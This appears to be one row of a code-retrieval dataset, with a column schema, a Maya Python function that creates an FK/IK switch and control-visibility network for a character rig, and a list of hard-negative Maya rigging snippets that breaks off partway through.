Column            Type            Range / values
query             stringlengths   9 – 3.4k
document          stringlengths   9 – 87.4k
metadata          dict            (nested object)
negatives         listlengths     4 – 101
negative_scores   listlengths     4 – 101
document_score    stringlengths   3 – 10
document_rank     stringclasses   102 values
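Each row pairs a natural-language query (typically a function docstring) with the positive code document it describes, plus a list of hard-negative code snippets and their scores. A minimal sketch of iterating such rows, assuming the data is exported as JSON Lines with the fields above (the file name is hypothetical):

import json

with open("code_retrieval_triplets.jsonl") as fh:     # hypothetical file name
    for line in fh:
        row = json.loads(line)
        query = row["query"]                      # natural-language description
        document = row["document"]                # matching source code
        negatives = row["negatives"]              # non-matching code snippets
        negative_scores = row["negative_scores"]  # one relevance score per negative
        # (query, document, negatives) form the triplet declared in the metadata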
Create an IK attribute on the given ctrl and connect the IK handles to the IK switch. Also connect the visibility of the FK ctrls and IK ctrls to the switch. This will create an 'IK' attr on the switch ctrl.
# Requires Maya's command module; `utils` refers to the rig package's helper
# module (create_node is assumed to wrap mc.createNode with naming), imported
# at module level in the original source.
import maya.cmds as mc

def create_fk_ik_switch(switch_ctrl, ik_handles, fk_ctrls, ik_ctrls,
                        vis_ctrl=None, switch_attr_name='IK',
                        vis_attr_name='fkIkCtrlVis'):
    fk_ctrls = mc.ls(fk_ctrls)
    ik_ctrls = mc.ls(ik_ctrls)
    ik_handles = mc.ls(ik_handles)

    if not vis_ctrl:
        vis_ctrl = switch_ctrl

    # Create attributes
    if not mc.objExists(switch_ctrl + '.' + switch_attr_name):
        mc.addAttr(switch_ctrl, ln=switch_attr_name, min=0, max=1, k=1)

    if not mc.objExists(vis_ctrl + '.' + vis_attr_name):
        mc.addAttr(vis_ctrl, ln=vis_attr_name, at='enum',
                   en='auto:fkOnly:ikOnly:both', k=1)

    # Connect ik handles
    for handle in ik_handles:
        mc.connectAttr(switch_ctrl + '.' + switch_attr_name, handle + '.ikBlend')

    # Create switch for ik ctrl visibility
    ik_choice = utils.create_node('choice', n=vis_attr_name + '_ik_choice')
    mc.connectAttr(vis_ctrl + '.' + vis_attr_name, ik_choice + '.selector')
    mc.connectAttr(switch_ctrl + '.' + switch_attr_name, ik_choice + '.input[0]')
    mc.setAttr(ik_choice + '.input[1]', 0)
    mc.setAttr(ik_choice + '.input[2]', 1)
    mc.setAttr(ik_choice + '.input[3]', 1)

    for ctrl in ik_ctrls:
        mc.setAttr(ctrl + '.v', l=0)
        mc.connectAttr(ik_choice + '.output', ctrl + '.v', f=1)
        mc.setAttr(ctrl + '.v', l=1)

    # Create switch for fk ctrl visibility
    fk_choice = utils.create_node('choice', n=vis_attr_name + '_fk_choice')
    fk_rv = utils.create_node('reverse', n=vis_attr_name + '_fk_rv')
    mc.connectAttr(switch_ctrl + '.' + switch_attr_name, fk_rv + '.inputX')
    mc.connectAttr(vis_ctrl + '.' + vis_attr_name, fk_choice + '.selector')
    mc.connectAttr(fk_rv + '.outputX', fk_choice + '.input[0]')
    mc.setAttr(fk_choice + '.input[1]', 1)
    mc.setAttr(fk_choice + '.input[2]', 0)
    mc.setAttr(fk_choice + '.input[3]', 1)

    for ctrl in fk_ctrls:
        mc.setAttr(ctrl + '.v', l=0)
        mc.connectAttr(fk_choice + '.output', ctrl + '.v', f=1)
        mc.setAttr(ctrl + '.v', l=1)

    return True
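For context, a minimal usage sketch of the function above; the control and handle names are hypothetical placeholders for nodes that would already exist in a Maya scene:

create_fk_ik_switch(
    switch_ctrl='arm_L_settings_CTL',      # hypothetical; receives the 'IK' attr
    ik_handles=['arm_L_ikHandle'],         # each handle's .ikBlend gets driven
    fk_ctrls=['arm_L_fk01_CTL', 'arm_L_fk02_CTL', 'arm_L_fk03_CTL'],
    ik_ctrls=['arm_L_ik_CTL', 'arm_L_pv_CTL'],
    vis_ctrl=None,                         # defaults to switch_ctrl
)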
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def create_soft_ik(ik_ctrl, ik_joints, ik_handle):\n\n # get name and constant variables\n name = ik_handle+'Soft'\n parent = utils.get_parent(ik_joints[0])\n ik_handle_parent = utils.get_parent(ik_handle)\n\n # get total length of joint chain\n chain_length = 0\n for jnt in ik_joints[1:]:\n chain_length += abs(mc.getAttr(jnt+'.tx'))\n\n mc.addAttr(ik_joints[0], ln='softIkChainLength', k=1, dv=chain_length)\n\n #create dist node, (distance between top ik_joint and ik_handle) = X\n soft_ik_root = utils.snap_locator(ik_joints[0], node_type='transform')\n soft_ik_root = mc.rename(soft_ik_root, name+'_root_'+utils.get_suffix('transform'))\n\n dist = utils.create_distance_reader(soft_ik_root, ik_handle_parent)\n\n #create the dSoft and softIK attributes on the controller\n mc.addAttr(ik_ctrl, ln='softIK', min=0, k=1)\n ctrl_clamp = mc.createNode('clamp')\n mc.connectAttr(ik_ctrl+'.softIK', ctrl_clamp+'.inputR')\n mc.setAttr(ctrl_clamp+'.minR', 0.0001)\n mc.setAttr(ctrl_clamp+'.maxR', 10000000)\n\n #create node network for soft IK\n da_pma = mc.createNode('plusMinusAverage', n=name+'_da_pma')\n x_minus_da_pma = mc.createNode('plusMinusAverage', n=name+'_x_minus_da_pma')\n negate_x_minus_md = mc.createNode('multiplyDivide', n=name+'_negate_x_minus_md')\n divBy_dSoft_md = mc.createNode('multiplyDivide', n=name+'_divBy_dSoft_md')\n pow_e_md = mc.createNode('multiplyDivide', n=name+'_pow_e_md')\n one_minus_pow_e_pma = mc.createNode('plusMinusAverage', n=name+'_one_minus_pow_e_pma')\n times_dSoft_md = mc.createNode('multiplyDivide', n=name+'_times_dSoft_md')\n plus_da_pma = mc.createNode('plusMinusAverage', n=name+'_plus_da_pma')\n da_cond = mc.createNode('condition', n=name+'_da_cond')\n dist_diff_pma = mc.createNode('plusMinusAverage', n=name+'_dist_diff_pma')\n defaultPos_pma = mc.createNode('plusMinusAverage', n=name+'_defaultPos_pma')\n\n #set operations\n mc.setAttr(da_pma+'.operation', 2)\n mc.setAttr(x_minus_da_pma+'.operation', 2)\n mc.setAttr(negate_x_minus_md+'.operation', 1)\n mc.setAttr(divBy_dSoft_md+'.operation', 2)\n mc.setAttr(pow_e_md+'.operation', 3)\n mc.setAttr(one_minus_pow_e_pma+'.operation', 2)\n mc.setAttr(times_dSoft_md+'.operation', 1)\n mc.setAttr(plus_da_pma+'.operation', 1)\n mc.setAttr(da_cond+'.operation', 5)\n mc.setAttr(dist_diff_pma+'.operation', 2)\n mc.setAttr(defaultPos_pma+'.operation', 2)\n\n #make connections\n mc.connectAttr(ik_joints[0]+'.softIkChainLength', da_pma+'.input1D[0]')\n mc.connectAttr(ctrl_clamp+'.outputR', da_pma+'.input1D[1]')\n\n mc.connectAttr(dist+'.localDistance', x_minus_da_pma+'.input1D[0]')\n mc.connectAttr(da_pma+'.output1D', x_minus_da_pma+'.input1D[1]')\n\n mc.connectAttr(x_minus_da_pma+'.output1D', negate_x_minus_md+'.input1X')\n mc.setAttr(negate_x_minus_md+'.input2X', -1)\n\n mc.connectAttr(negate_x_minus_md+'.outputX', divBy_dSoft_md+'.input1X')\n mc.connectAttr(ctrl_clamp+'.outputR', divBy_dSoft_md+'.input2X')\n\n mc.setAttr(pow_e_md+'.input1X', 2.718281828)\n mc.connectAttr(divBy_dSoft_md+'.outputX', pow_e_md+'.input2X')\n\n mc.setAttr(one_minus_pow_e_pma+'.input1D[0]', 1)\n mc.connectAttr(pow_e_md+'.outputX' , one_minus_pow_e_pma+'.input1D[1]')\n\n mc.connectAttr(one_minus_pow_e_pma+'.output1D', times_dSoft_md+'.input1X')\n mc.connectAttr(ctrl_clamp+'.outputR', times_dSoft_md+'.input2X')\n\n mc.connectAttr(times_dSoft_md+'.outputX', plus_da_pma+'.input1D[0]')\n mc.connectAttr(da_pma+'.output1D', plus_da_pma+'.input1D[1]')\n\n mc.connectAttr(da_pma+'.output1D', da_cond+'.firstTerm')\n mc.connectAttr(dist+'.localDistance', 
da_cond+'.secondTerm')\n mc.connectAttr(dist+'.localDistance', da_cond+'.colorIfFalseR')\n mc.connectAttr(plus_da_pma+'.output1D', da_cond+'.colorIfTrueR')\n\n mc.connectAttr(da_cond+'.outColorR', dist_diff_pma+'.input1D[0]')\n mc.connectAttr(dist+'.localDistance', dist_diff_pma+'.input1D[1]')\n\n mc.setAttr(defaultPos_pma+'.input1D[0]', 0)\n mc.connectAttr(dist_diff_pma+'.output1D', defaultPos_pma+'.input1D[1]')\n\n # Create new ik aim node\n up = [1,0,0]\n aim = [0,1,0]\n\n grp = mc.createNode('transform', n=name+'_soft_aim_'+utils.get_suffix('transform'), p=ik_handle_parent)\n gAim = mc.createNode('transform', n=name+'_soft_'+utils.get_suffix('transform'), p=grp)\n\n mc.aimConstraint(soft_ik_root,\n grp,\n aim=aim,\n u=up,\n wu=up,\n wut='objectRotation',\n wuo=ik_ctrl,\n n=grp+'_ac')\n\n mc.connectAttr(defaultPos_pma+'.output1D', gAim+'.ty')\n mc.pointConstraint(gAim, ik_handle)\n mc.parent(ik_handle, gAim)\n\n # parent stuff\n if parent:\n mc.parent(soft_ik_root, parent)\n\n return gAim", "def switch_to_ik(robot):\n\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n try:\n # Turn FK control visibility off\n pm.setAttr(fk_ctrls_path + '.v', 0)\n\n # Turn IK control visibility on\n pm.setAttr(target_ctrl_path + '.v', 1)\n pm.setAttr(format_path(__TARGET_CTRL_PATH + '|{1}target_CTRLShape',\n robot) + '.visibility', 1)\n\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.v'.format(robot), 1)\n except:\n # These aren't crucial to the switch as they're just visual, and \n # a connection or locking of any of these attributes might throw\n # an error, so let's just skip it\n pass\n \n try:\n # Snap IK Ctrl to FK location\n _snap_ik_target_to_fk(robot)\n except:\n raise MimicError('Error swithching to IK; could not snap IK CTRL to FK')\n\n ## Find closest IK configuration to current FK pose ##\n # Get FK config and all IK solutions\n ik_sols = find_ik_solutions(robot)\n fk_config = find_fk_config(robot)\n\n # Remove all MFG-specific offsets from the FK config\n solver_params = get_solver_params(robot)\n axis_offsets = solver_params.axis_offsets\n rot_directions = solver_params.rot_directions\n fk_config_norm = _normalize_fk_pose(fk_config, axis_offsets, rot_directions)\n\n ## TO-DO: account for FK config rotations above and below 180 degrees\n # Select the closes IK configuration to the given FK config\n ik_config = find_closest_config(fk_config_norm, ik_sols)\n\n # Match IK config to FK pose\n pm.setAttr(target_ctrl_path + '.ikSolution1', ik_config[0])\n pm.setAttr(target_ctrl_path + '.ikSolution2', ik_config[1])\n pm.setAttr(target_ctrl_path + '.ikSolution3', ik_config[2])\n\n # turn ik solve back on\n pm.setAttr(target_ctrl_path + '.ik', 1)", "def make_fkikSwitch_connection_attrs(partpre=None, side='Lt', source_ctrl=None, tag_name='switch', snapTo=None,\n add_attrs=None):\n\n switch_anim = ''\n if source_ctrl is not None:\n switch_anim = source_ctrl\n\n partpre = partpre\n if partpre == '':\n partpre = 'mypart_'\n\n if source_ctrl is None:\n # filepath = r'C:/Users/Nicob/Documents/maya/scripts/rigBot/rigBot/config/switcher_anim.mb'\n system_base_path = os.path.dirname(utils.__file__)\n base_path = os.path.join(system_base_path, 'config')\n file_path = os.path.join(base_path, 'switcher_anim.mb')\n newnodes = mc.file(filepath, i=1, ignoreVersion=1, rnn=1, mergeNamespacesOnClash=0, rpr=partpre, ra=1,\n options=\"v=0;\", pr=1)\n\n switch_anim = partpre + '_CTL'\n\n # pos switcher 
grpOffset node if snapTo\n\n if snapTo is not None:\n utils.snap_to_transform(snapTo, switch_anim.replace('CTL', 'grpOffset'))\n mc.setAttr(switch_anim.replace('CTL', 'grpOffset') + '.r', 0, 0, 0)\n\n # get value of tags and sort into ik and fk vis groups\n\n iks = []\n fks = []\n nodes = mc.ls('*.' + tag_name)\n\n for node in nodes:\n if partpre in node and side in node:\n mode = mc.getAttr(node)\n if mode:\n mode = mode.lower()\n if 'ik' in mode:\n iks.append(node.split('.')[0])\n if 'fk' in mode:\n fks.append(node.split('.')[0])\n for ik in iks:\n # ikparpar=utils.get_parent(ik)\n ikpar = utils.get_parent(ik)\n if ikpar is None:\n mc.connectAttr(switch_anim + '.FK_IK', ik + '.visiblity', f=1)\n else:\n mc.connectAttr(switch_anim + '.FK_IK', ikpar + '.visibility', f=1)\n rvn = mc.createNode('reverse', name=switch_anim + '_fkik_vis_rv')\n mc.connectAttr(switch_anim + '.FK_IK', rvn + '.inputX')\n for fk in fks:\n fkpar = utils.get_parent(fk)\n if fkpar:\n mc.connectAttr(rvn + '.outputX', fkpar + '.visibility', f=1)\n if add_attrs is not None:\n for att in add_attrs:\n mc.addAttr(switch_anim, ln=att, min=0, max=1, dv=0, k=1)\n\n nns = []\n\n for nn in reversed(newnodes):\n nnn = ''\n sn = nn.split(\"|\")\n nnn = mc.rename(nn, sn[-1])\n nns.append(nnn)\n\n anim = mc.ls(partpre + '_CTL')\n\n # if mc.objExists (partpre+'_skeleton_grp'):\n # mc.parent (anim, partpre+'_skeleton_grp' )\n return anim", "def create_ik_setup(controls, joints):\n\n # Create control offset transforms\n exp_tf_ms = []\n for ctl in controls:\n par = cmds.listRelatives(ctl, parent=True)\n buf = create_offset_transform(ctl, BUF)\n exp = create_offset_transform(ctl, EXP)\n off = create_offset_transform(ctl, OFF)\n cmds.parent(ctl, off)\n cmds.parent(off, exp)\n cmds.parent(exp, buf)\n if par:\n cmds.parent(buf, par[0])\n exp_tf_ms.append(buf)\n\n root_control, pole_control, goal_control = controls\n handle, effector = cmds.ikHandle(sj=joints[0], ee=joints[-1], sol='ikRPsolver')\n cmds.setAttr('{}.hiddenInOutliner'.format(handle), True)\n cmds.orientConstraint(goal_control, joints[-1], mo=True)\n cmds.parent(handle, goal_control)\n cmds.hide(handle)\n\n # Connect root control to ik joint offset group\n ik_joints_offset = cmds.listRelatives(joints[0], p=True)[0]\n cmds.parentConstraint(root_control, ik_joints_offset, mo=True)\n cmds.scaleConstraint(root_control, ik_joints_offset, mo=True)\n\n # Connect twisting and pole vector control\n cmds.addAttr(goal_control, ln='twist', at='float', k=True)\n cmds.connectAttr('{}.twist'.format(goal_control), '{}.twist'.format(handle))\n cmds.poleVectorConstraint(pole_control, handle)\n\n # Add PV visibility attribute\n cmds.addAttr(goal_control, shortName='pv', longName='poleVector', at='bool', k=True)\n cmds.connectAttr('{}.pv'.format(goal_control), '{}.v'.format(pole_control))\n cmds.setAttr('{}.pv'.format(goal_control),1)\n\n # Add curve that points elbow to pole control\n crv = cmds.curve(p=[[0, 0, 0], [0, 1, 0]], d=1)\n cmds.connectAttr('{}.visibility'.format(pole_control), '{}.visibility'.format(crv))\n lock_hide_attrs(crv, attrs=['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz'])\n cmds.setAttr('{}.overrideEnabled'.format(crv), True)\n cmds.setAttr('{}.overrideDisplayType'.format(crv), 2)\n decomp_joint = cmds.createNode('decomposeMatrix')\n decomp_control = cmds.createNode('decomposeMatrix')\n cmds.connectAttr('{}.worldMatrix'.format(joints[1]), '{}.inputMatrix'.format(decomp_joint))\n cmds.connectAttr('{}.worldMatrix'.format(pole_control), 
'{}.inputMatrix'.format(decomp_control))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_joint), '{}.controlPoints[0]'.format(crv))\n cmds.connectAttr('{}.outputTranslate'.format(decomp_control), '{}.controlPoints[1]'.format(crv))\n\n return handle, crv, exp_tf_ms", "def switch_setup(params, rig, ik_joints):\n\n # Duplicate for bind skeleton\n skeleton = [x.name() for x in params['ikSkeleton']]\n bind_skeleton = cmds.duplicate(skeleton, n=skeleton[0] + '_bnd_0')\n #bind_skeleton\n\n # Hide all attribute on Controller\n fkikcontrol = params['fkIkSwitch'].name()\n attrs = ['tx', 'ty', 'tz', 'rx', 'ry', 'rz', 'sx', 'sy', 'sz', 'v']\n for i in attrs:\n cmds.setAttr('{node}.{attr}'.format(node=fkikcontrol, attr=i), k=False, cb=False)\n\n # Create FK/IK Switch attributes\n cmds.addAttr(fkikcontrol, sn='FKIKBlend', at='float', min=0, max=1, dv=0, k=True)\n cmds.addAttr(fkikcontrol, sn='AutoVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='FKVis', at='bool', dv=1, k=True)\n cmds.addAttr(fkikcontrol, ln='IKVis', at='bool', dv=1, k=True)\n\n # create control offset transforms\n # par = cmds.listRelatives(fkikcontrol, parent=True)\n # buf = create_offset_transform(fkikcontrol, BUF)\n # cmds.parent(fkikcontrol, buf)\n # if par: cmds.parent(buf, par[0])\n\n # Parent Skeleton to rig group\n ik_skeleton = [x.name() for x in params['ikSkeleton']]\n fk_skeleton = [x.name() for x in params['fkSkeleton']]\n cmds.parent(ik_skeleton[0], rig['rigGroup'])\n cmds.parent(fk_skeleton[0], rig['rigGroup'])\n\n # Constraint Bind Skeleton\n fk_ik_finish(ik_joints, bind_skeleton, params)", "def setCtrls(self, fks, ik, upv):\n # type: (list[str], str, str) -> None\n\n self.fkCtrls = [self._getNode(x) for x in fks]\n self.fkTargets = [self._getMth(x) for x in fks]\n\n self.ikCtrl = self._getNode(ik)\n self.ikTarget = self._getMth(ik)\n\n self.upvCtrl = self._getNode(upv)\n self.upvTarget = self._getMth(upv)\n\n self.ikRotCtrl = self._getNode(ik.replace(\"_ik_\", \"_rot_\"))\n self.ikRotTarget = self.ikTarget", "def key_ik(*args):\n\n robots = get_robot_roots()\n if not robots:\n pm.warning('No robots selected')\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n if not pm.getAttr(target_ctrl_path + '.ik'):\n switch_to_ik(robot)\n\n ik_attributes = ['ik',\n 'v',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3']\n\n # Key all IK elements\n for attr in ik_attributes:\n pm.setKeyframe(target_ctrl_path, attribute=attr)\n\n if pm.objExists(tool_ctrl_path):\n pm.setKeyframe(tool_ctrl_path, attribute='v')\n\n fk_pose = find_fk_config(robot)\n\n # Key all FK elements\n pm.setKeyframe(format_path(__A1_FK_CTRL_PATH, robot),\n attribute='rotateY',\n value=fk_pose[0])\n pm.setKeyframe(format_path(__A2_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[1])\n pm.setKeyframe(format_path(__A3_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[2])\n pm.setKeyframe(format_path(__A4_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[3])\n pm.setKeyframe(format_path(__A5_FK_CTRL_PATH, robot),\n attribute='rotateX',\n value=fk_pose[4])\n pm.setKeyframe(format_path(__A6_FK_CTRL_PATH, robot),\n attribute='rotateZ',\n value=fk_pose[5])\n\n # Key visibility of FK controllers\n pm.setKeyframe(fk_ctrls_path, attribute='visibility')\n\n # Key tool controllers\n if pm.checkBox('cb_keyToolCtrl', query=True, value=True):\n if pm.objExists(tool_ctrl_path):\n 
pm.setKeyframe(tool_ctrl_path, attribute='translate')\n pm.setKeyframe(tool_ctrl_path, attribute='rotate')\n else:\n pm.setKeyframe(target_ctrl_path, attribute='translate')\n pm.setKeyframe(target_ctrl_path, attribute='rotate')", "def switch_to_fk(robot):\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n fk_ctrls_path = format_path(__FK_CTRLS_PATH, robot)\n\n # Turn IK control visibility off\n pm.setAttr(get_target_ctrl_path(robot) + '.v', 0)\n\n if pm.objExists(tool_ctrl_path):\n pm.setAttr(tool_ctrl_path + '.v'.format(robot), 0)\n\n # Turn FK control visibility on\n pm.setAttr(fk_ctrls_path + '.v'.format(robot), 1)\n\n # Find axis angles from IK pose, and match FK control handles\n fk_config = find_fk_config(robot)\n fk_config = _reconcile_fk_pose(robot, fk_config)\n\n pm.setAttr(format_path(__A1_FK_CTRL_PATH, robot) + '.rotateY',\n fk_config[0])\n pm.setAttr(format_path(__A2_FK_CTRL_PATH, robot) + '.rotateX',\n fk_config[1])\n pm.setAttr(format_path(__A3_FK_CTRL_PATH, robot) + '.rotateX',\n fk_config[2])\n pm.setAttr(format_path(__A4_FK_CTRL_PATH, robot) + '.rotateZ',\n fk_config[3])\n pm.setAttr(format_path(__A5_FK_CTRL_PATH, robot) + '.rotateX',\n fk_config[4])\n pm.setAttr(format_path(__A6_FK_CTRL_PATH, robot) + '.rotateZ',\n fk_config[5])\n\n pm.setAttr(target_ctrl_path + '.ik', 0)", "def toggle_ik_fk(*args):\n\n current_tab = pm.tabLayout('switcher_tab_layout',\n query=True,\n selectTab=True)\n\n if current_tab == 'ikTab':\n ik_tab = 1\n else:\n ik_tab = 0\n\n robots = get_robot_roots(1)\n if not robots:\n return\n\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n \n if ik_tab:\n if pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_ik(robot)\n\n else:\n if not pm.getAttr(target_ctrl_path + '.ik'):\n continue\n\n switch_to_fk(robot)\n \n # Maintain appropriate selections on each robot\n try:\n selection = []\n active_robots = get_robot_roots()\n if active_robots:\n if ik_tab:\n for robot in active_robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n\n if pm.objExists(tool_ctrl_path):\n selection.append(tool_ctrl_path)\n else:\n selection.append(target_ctrl_path)\n else:\n for robot in active_robots:\n selection.append(format_path(__A6_FK_CTRL_PATH, robot))\n \n pm.select(selection)\n else:\n pass\n\n except:\n pm.warning('Error selecting after IK/FK switch')", "def SetControlSignals(inst_spec, itype, ctrl):\n\n itype <<= inst_spec.itype\n\n #\n # The Literal() function (see instructions.py) generates an Atlas 'literal'\n # value that can be used on the right-hand side of an assignment (as is done\n # below).\n #\n\n ctrl.ex <<= inst_spec.ex_ctrl.Literal()\n ctrl.mem <<= inst_spec.mem_ctrl.Literal()\n ctrl.wb <<= inst_spec.wb_ctrl.Literal()", "def ikfkMechanics(module, extraName, jnts, mechSkelGrp, ctrlGrp, moduleType, rig):\n jntSuffix = suffix['joint']\n newJntChains = []\n ## create duplicate chains\n for chain in ['IK', 'FK']:\n newJnts = utils.duplicateJntChain(chain, jnts, parent=mechSkelGrp.name)\n newJntChains.append(newJnts)\n ikJnts = newJntChains[0]\n fkJnts = newJntChains[1]\n for i, each in enumerate(jnts):\n newName = '{}_result{}'.format(each.rsplit('_', 1)[0], jntSuffix)\n jnts[i] = cmds.rename(each, newName)\n # utils.addJntToSkinJnt(jnts[i], rig=rig)\n ## settings control\n module.settingCtrl = ctrlFn.ctrl(name='{}{}Settings'.format(extraName, moduleType),\n guide='{}{}Settings{}'.format(module.moduleName,\n moduleType, 
suffix['locator']),\n deleteGuide=True, side=module.side, skipNum=True,\n parent=module.rig.settingCtrlsGrp.name,\n scaleOffset=rig.scaleOffset, rig=rig)\n if moduleType == 'arm':\n settingJnt = jnts[3]\n else:\n settingJnt = jnts[2]\n module.settingCtrl.makeSettingCtrl(ikfk=True, parent=settingJnt)\n ## parent constraints\n for jnt, ikJnt, fkJnt in zip(jnts, ikJnts, fkJnts):\n parConstr = cmds.parentConstraint(ikJnt, fkJnt, jnt)\n cmds.connectAttr(module.settingCtrl.ctrl.ikfkSwitch, '{}.{}W1'.format(parConstr[0], fkJnt))\n swRev = utils.newNode('reverse', name='{}{}IKFKSw'.format(extraName, moduleType),\n side=module.side)\n swRev.connect('inputX', module.settingCtrl.ctrl.ikfkSwitch, mode='to')\n swRev.connect('outputX', '{}.{}W0'.format(parConstr[0], ikJnt), mode='from')\n ## control vis groups\n ikCtrlGrp = utils.newNode('group', name='{}{}IKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n fkCtrlGrp = utils.newNode('group', name='{}{}FKCtrls'.format(extraName, moduleType),\n side=module.side, parent=ctrlGrp.name, skipNum=True)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.999, v=1)\n cmds.setDrivenKeyframe(ikCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=1, v=0)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0.001, v=1)\n cmds.setDrivenKeyframe(fkCtrlGrp.name, at='visibility',\n cd=module.settingCtrl.ctrl.ikfkSwitch, dv=0, v=0)\n return ikJnts, fkJnts, jnts, ikCtrlGrp, fkCtrlGrp", "def add_attr(nc_handle, var_name, key, value):\n doi_attr_name = 'DOI'\n nc.variables[varname].setncattr(key, value)", "def ik_to_fk(node):\n ik_main_off = get_parent(node.ik_main_conn)\n fk_01_off = get_parent(node.fk_01_conn)\n fk_02_off = get_parent(node.fk_02_conn)\n fk_03_off = get_parent(node.fk_03_conn)\n\n ik_main_world_trans = get_world_trans(node.ik_main_conn)\n fk_01_world_trans = get_world_trans(node.fk_01_conn)\n ik_main_off_world_trans = get_world_trans(ik_main_off)\n fk_01_off_world_trans = get_world_trans(fk_01_off)\n fk_02_off_world_trans = get_world_trans(fk_02_off)\n fk_03_off_world_trans = get_world_trans(fk_03_off)\n\n # calculate base information\n def_len = (ik_main_off_world_trans - fk_01_off_world_trans).length()\n\n # Calculate ik direction\n ik_dir_01 = ik_main_off_world_trans - fk_01_off_world_trans\n ik_dir_02 = ik_main_world_trans - fk_01_world_trans\n\n ik_dir_rot = ik_dir_01.rotateTo(ik_dir_02).asEulerRotation()\n\n # Apply ik direction -> important to calculate correct pole rotations\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(ik_dir_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ik pole rotations\n ik_pole_world_mat = get_world_matrix(node.ik_pole_conn, 0)\n fk_03_world_inv_mat = get_world_inv_matrix(node.fk_01_conn, 0)\n\n ik_pole_rot_mat = ik_pole_world_mat * fk_03_world_inv_mat\n\n ik_pole_vec = oMa.MTransformationMatrix(ik_pole_rot_mat).translation(oMa.MSpace.kWorld)\n ik_pole_vec.y = 0\n\n ik_pole_rot = oMa.MVector.kZaxisVector.rotateTo(ik_pole_vec).asEulerRotation()\n\n # Calculate ik rotations\n tri_a_len = (fk_02_off_world_trans - fk_01_off_world_trans).length()\n tri_b_len = (fk_03_off_world_trans - fk_02_off_world_trans).length()\n tri_c_len = (ik_main_world_trans - fk_01_world_trans).length()\n\n if tri_c_len >= def_len:\n fk_02_angle = 0\n fk_01_angle = 0\n else:\n fk_02_angle = math.pi - 
solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"C\")\n fk_01_angle = -solve_triangle(tri_a_len, tri_b_len, tri_c_len, \"B\")\n\n # Add rotations together\n fk_01_temp = oMa.MEulerRotation(fk_01_angle, ik_pole_rot.y, 0)\n\n ik_dir_mat = compose_mat(ik_dir_rot)\n fk_01_mat = compose_mat(fk_01_temp)\n rot_mat = fk_01_mat * ik_dir_mat\n\n # Apply everything\n fk_01_rot = get_rot_from_mat(rot_mat)\n fk_02_rot = (fk_02_angle, 0, 0)\n\n fk_01_rot_plugs = get_rot_plugs(node.fk_01_conn)\n for i, plug in enumerate(fk_01_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_01_rot[i], oMa.MAngle.kRadians))\n\n fk_02_rot_plugs = get_rot_plugs(node.fk_02_conn)\n for i, plug in enumerate(fk_02_rot_plugs):\n if not plug.isLocked:\n plug.setMAngle(oMa.MAngle(fk_02_rot[i], oMa.MAngle.kRadians))\n\n # Calculate ankle rotation\n fk_03_rot = rot_world_space_to_local_space(node.ik_main_conn, get_parent(node.fk_03_conn))\n\n fk_03_rot_plugs = get_rot_plugs(node.fk_03_conn)\n for i, plug in enumerate(fk_03_rot_plugs):\n plug.setMAngle(oMa.MAngle(fk_03_rot[i], oMa.MAngle.kRadians))", "def spline_ik(self):\n ikHandle, ikEffector, ikCurve = pm.ikHandle(\n name=self.name + \"_ikh\",\n startJoint=self.joints[0],\n endEffector=self.joints[-1],\n solver='ikSplineSolver',\n simplifyCurve=False\n )\n\n # Get the number of digits so we can set the zfill correctly,\n digits = len(str(len(ikCurve.cv)))\n\n # Iterate over each cv and create a cluster deformer,\n for i, cv in enumerate(ikCurve.cv):\n cluster_node, cluster_handle = pm.cluster(cv)\n cluster_handle.rename(\n ikCurve.nodeName() + '_ch_{}'.format(str(i).zfill(digits))\n )", "def delete_ik_fk_keys(*args):\n if not check_robot_selection():\n pm.warning('No robots selected; ' \\\n 'Select at least one robot.')\n\n keyed_attrs = {__TARGET_CTRL_PATH: ['ik',\n 'visibility',\n 'ikSolution1',\n 'ikSolution2',\n 'ikSolution3'],\n __FK_CTRLS_PATH: ['visibility'],\n __A1_FK_CTRL_PATH: ['rotateY'],\n __A2_FK_CTRL_PATH: ['rotateX'],\n __A3_FK_CTRL_PATH: ['rotateX'],\n __A4_FK_CTRL_PATH: ['rotateZ'],\n __A5_FK_CTRL_PATH: ['rotateX'],\n __A6_FK_CTRL_PATH: ['rotateZ']}\n\n robots = get_robot_roots()\n\n current_frame = pm.currentTime()\n for robot in robots:\n target_ctrl_path = get_target_ctrl_path(robot)\n tool_ctrl_path = get_tool_ctrl_path(robot)\n # Check if there's a keyframe set on the target_CTRL.ik attribute\n key = pm.keyframe(target_ctrl_path,\n attribute='ik',\n query=True,\n time=current_frame)\n\n # If there is no keyframe set on the IK attribute, continue to the\n # next robot\n if not key:\n 